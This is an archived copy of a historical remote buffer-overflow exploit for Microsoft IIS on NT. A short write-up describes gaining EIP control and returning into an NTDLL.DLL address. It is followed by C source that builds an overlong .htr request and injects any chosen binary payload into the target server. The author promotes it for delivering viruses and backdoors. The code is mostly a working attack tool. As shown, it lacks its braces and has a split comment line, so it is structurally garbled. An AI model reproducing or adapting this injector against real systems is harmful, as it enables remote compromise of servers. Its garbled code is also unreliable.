TUCoPS :: Web :: IIS :: iis-nt.c

IIS Exploit for NT

I read yesturday on eEye.com that they had discovered a buffer overflow in
IIS.  I could not resist writing an exploit.  I did not have time to design
a really cool payload for this exploit, so I simply wrote the injection
code.  However, this is meaningful for several reasons.  Attached is the
injection code.  The exploit will deliver any payload of your choosing.
Your payload will be executed.  This empowers you to create a "collection"
of payloads that are not dependant upon the injection vector in any way.
This decoupling is important for military needs, where a single injection
vector needs to work, but the "warhead" may be different depending on the
targets characterization.

The exploit was fairly simple to build.  In short, I read on eEye.com that
they had overflowed IIS with something like a ~3000 character URL.  Within
minutes I had caused IIS to crash with EIP under my control.  I used a
special pattern in the buffer (see code) to make it easy for me to identify
where EIP was being popped from.  The pattern also made it easy to
determine where I was jumping around.  Use the tekneek Danielson. ;-)

So, I controlled EIP, but I needed to get back to my stack segment, of
course.  This is old school, and I really lucked out.  Pushed down two
levels on the stack was an address for my buffer.  I couldn't have asked
for more.  So, I found a location in NTDLL.DLL (0x77F88CF0) that I could
return to.  It had two pop's followed by a return.  This made my injection
vector return to the value that was stored two layers down on the stack.
Bam, I was in my buffer.  So, I landed in a weird place, had to add a near
jump to get to somewhere more useful.. nothing special, and here we are
with about 2K of payload space.  If you don't supply any mobile code to be
run, the injection vector will supply some for you.  The default payload in
simply a couple of no-ops followed by a debug breakpoint (interrupt 3)...
It's easy to play with if you want to build your own payloads.. just keep a
debugger attached to inetinfo.exe on the target machine.

Lastly, I would simply like to point out that monoculture installations are
very dangerous.  It's a concept from agribusiness.. if you have all one
crop, and a virus comes along that can kill that crop, your out of
business.  With almost ALL of the IIS servers on the net being vulnerable
to this exploit, we also have a monoculture.  And, it's not just IIS.  The
backbone of the Internet is built on common router technology (such as
cisco IOS).  If a serious exploit comes along for the IOS kernel, can you
imagine the darkness that will fall?

<--- snip

// IIS Injector for NT
// written by Greg Hoglund <hoglund@ieway.com>
// http://www.rootkit.com
// If you would like to deliver a payload, it must be stored in a binary file.
// This injector decouples the payload from the injection code allowing you to
// create a numnber of different attack payloads.  This code could be used,
// example, by a military that needs to attack IIS servers, and has
// the eligible hosts.  The proper attack can be chosen depending on needs.
// the payload is so large with this injection vector, many options are
// First and foremost, virii can delivered with ease.  The payload is also
// large enough to remotely download and install a back door program.
// Considering the monoculture of NT IIS servers out on the 'Net, this
represents a
// very serious security problem.

#include <windows.h>
#include <stdio.h>
#include <winsock.h>

void main(int argc, char **argv)
        SOCKET s = 0;
        WSADATA wsaData;

        if(argc < 2)
                fprintf(stderr, "IIS Injector for NT\nwritten by Greg Hoglund, " \
                        "http://www.rootkit.com\nUsage: %s <target" \
                                                "ip> <optional payload file>\n", argv[0]);

        WSAStartup(MAKEWORD(2,0), &wsaData);

        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

        if(INVALID_SOCKET != s)
                SOCKADDR_IN anAddr;
                anAddr.sin_family = AF_INET;
                anAddr.sin_port = htons(80);
                anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

                if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
                        static char theSploit[4096];
                        // fill pattern
                        char kick = 'z'; //0x7a
                        char place = 'A';

                        // my uber sweet pattern gener@t0r
                        for(int i=0;i<4096;i+=4)
                                theSploit[i] = kick;
                                theSploit[i+1] = place;
                                theSploit[i+2] = place + 1;
                                theSploit[i+3] = place + 2;

                                if(++place == 'Y') // beyond 'XYZ'
                                        place = 'A';
                                        if(--kick < 'a') kick = 'a';

                        _snprintf(theSploit, 5, "get /");
                        _snprintf(theSploit + 3005, 22, "BBBB.htr HTTP/1.0\r\n\r\n\0");

                        // after crash, looks like inetinfo.exe is jumping to the address
                        // stored @ location 'GHtG' (0x47744847)
                        // cross reference back to the buffer pattern, looks like we need
                        // to store our EIP into theSploit[598]

                        // magic eip into NTDLL.DLL
                        theSploit[598] = (char)0xF0;
                        theSploit[599] = (char)0x8C;
                        theSploit[600] = (char)0xF8;
                        theSploit[601] = (char)0x77;

                        // code I want to execute
                        // will jump foward over the
                        // embedded eip, taking us
                        // directly to the payload
                        theSploit[594] = (char)0x90;  //nop
                        theSploit[595] = (char)0xEB;  //jmp
                        theSploit[596] = (char)0x35;  //
                        theSploit[597] = (char)0x90;  //nop

                        // the payload.  This code is executed remotely.
                        // if no payload is supplied on stdin, then this default
                        // payload is used.  int 3 is the debug interrupt and
                        // will cause your debugger to "breakpoint" gracefully.
                        // upon examiniation you will find that you are sitting
                        // directly in this code-payload.
                        if(argc < 3)
                                theSploit[650] = (char) 0x90; //nop
                                theSploit[651] = (char) 0x90; //nop
                                theSploit[652] = (char) 0x90; //nop
                                theSploit[653] = (char) 0x90; //nop
                                theSploit[654] = (char) 0xCC; //int 3
                                theSploit[655] = (char) 0xCC; //int 3
                                theSploit[656] = (char) 0xCC; //int 3
                                theSploit[657] = (char) 0xCC; //int 3
                                theSploit[658] = (char) 0x90; //nop
                                theSploit[659] = (char) 0x90; //nop
                                theSploit[660] = (char) 0x90; //nop
                                theSploit[661] = (char) 0x90; //nop
                                // send the user-supplied payload from
                                // a file.  Yes, that's a 2K buffer for
                                // mobile code.  Yes, that's big.
                                FILE *in_file;
                                in_file = fopen(argv[2], "rb");
                                        int offset = 650;
                                        while( (!feof(in_file)) && (offset < 3000))
                                                theSploit[offset++] = fgetc(in_file);
                        send(s, theSploit, strlen(theSploit), 0);

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